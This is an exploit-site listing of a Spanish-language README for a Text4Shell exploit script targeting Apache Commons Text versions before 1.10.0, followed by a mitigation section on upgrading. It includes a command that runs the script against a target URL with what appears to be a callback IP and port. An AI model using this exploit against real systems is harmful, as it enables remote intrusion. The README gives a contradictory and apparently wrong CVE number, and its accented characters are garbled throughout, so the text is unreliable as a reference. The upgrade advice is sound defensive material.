Share
## https://sploitus.com/exploit?id=BF15CAF2-2A1C-59BD-9250-21FF21760092
# riskootext4shell
text4shell script for text coomons < =1.10 CVE-2022-33980


- La biblioteca Apache Commons Text es una librer铆a alternativa a las funcionalidades nativas del JDK de Java . 
- Versiones previas a versi贸n 1.10.0 de apache commons
- Similar a CVE-2022-33980

```bash
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22
```



## Mitigaci贸n


La soluci贸n principal consiste en actualizar urgentemente el componente Apache Commons Text a las versiones disponibles que corrigen esta vulnerabilidad. Concretamente, se debe actualizar a una versi贸n 1.10.0 o posterior de Apache Commons Text.

En esta actualizaci贸n, se ha optado por deshabilitar por defecto aquellas sustituciones problem谩ticas. En el fichero changelog de la librer铆a se incluye el siguiente cambio:

Make default string lookups configurable v铆a system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled v铆a system property. See StringLookupFactory for details.

Desde Apache se ha publicado un comunicado con la informaci贸n oficial y una referencia a la actualizaci贸n en la que se corrige el problema.